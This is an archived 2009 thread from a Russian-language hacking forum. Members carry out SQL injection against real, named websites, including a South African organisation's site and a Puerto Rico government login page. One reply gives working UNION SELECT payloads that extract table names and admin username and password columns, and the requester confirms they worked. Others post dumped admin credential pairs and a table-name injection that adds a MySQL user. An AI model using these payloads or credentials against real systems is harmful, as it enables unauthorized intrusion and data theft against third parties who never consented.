ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
13.11.2009, 21:53
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
На этом сайте есть таблица user
http://www.pcci.org.za/default.asp?id=946
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'id = 946''.
/default.asp, line 128
http://www.pcci.org.za/default.asp?id=946+order+by+2
http://www.pcci.org.za/default.asp?id=946+union+select+1,2
http://www.pcci.org.za/default.asp?id=-946+union+select+*+from+msysobjects+in+'.'
Microsoft JET Database Engine error '80004005'
The Microsoft Jet database engine cannot open the file 'c:\windows\system32\inetsrv'. It is already opened exclusively by another user, or you need permission to view its data.
/default.asp, line 128
Но вывести нечего не удаеться.
Поскажите, как правилбно составить запрос.
|
|
|
13.11.2009, 21:58
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
FlaktW,
http://www.pcci.org.za/default.asp?id=-1+union+select+null,name+from+msysobjects+where+MS ysObjects.Type=6
id=-1+union+select+username,password+from+ADMINISTRATO RS
Последний раз редактировалось ElteRUS; 13.11.2009 в 22:02..
|
|
|
|
13.11.2009, 22:20
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
ElteRUS, смотри, www.pcci.org.za/admin - админка
есть три пары:
admin;admin
admi;admin
manager;manager
правильно?
Но опять же, в админку не попасть)
Последний раз редактировалось jecka3000; 13.11.2009 в 22:22..
|
|
|
|
13.11.2009, 22:25
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от ElteRUS
FlaktW,
http://www.pcci.org.za/default.asp?id=-1+union+select+null,name+from+msysobjects+where+MS ysObjects.Type=6
id=-1+union+select+username,password+from+ADMINISTRATO RS
Thanks, все получилось.
|
|
|
|
13.11.2009, 22:38
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
http://login.main.cne.gov.pr/login.php
есть следующие пары:
admin  yn@mic
webmaster:2624
Но опять же ни один не подошел! Мне кажется, что я что то не так делаю,т.к. не может не подходить пароли уже к больше чем к 10 сайтам! |
|
|
|
13.11.2009, 22:39
|
|
Новичок
Регистрация: 12.11.2009
Сообщений: 20
Провел на форуме:
32270
Репутация:
0
|
|
Возник такой вопрос. Можно с помощью SQL injection внедрить запросы типа INSERT и DELETE? Для MySQL.
Последний раз редактировалось fng; 13.11.2009 в 22:46..
|
|
|
|
13.11.2009, 22:55
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
Ну если есть инъекция в INSERT/DELETE запросе - то можно.
|
|
|
|
13.11.2009, 23:03
|
|
Новичок
Регистрация: 12.11.2009
Сообщений: 20
Провел на форуме:
32270
Репутация:
0
|
|
а если в SELECT-е -- нет?
|
|
|
|
13.11.2009, 23:04
|
|
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
Провел на форуме:
4761503
Репутация:
229
|
|
Сообщение от Ins3t
Ну если есть инъекция в INSERT/DELETE запросе - то можно.
Пример внедрения в студию
|
|
|
|
13.11.2009, 23:14
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
Скуль в имени таблицы:
INSERT INTO [SQL] VALUES('site','lala','blabla','lolo','aaa');
INSERT INTO [mysql.user (user, host, password) VALUES ('new_user', PASSWORD('password')),a,b,c)/*] VALUES ('site', 'lala', 'blabla', 'lolo', 'aaa');
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
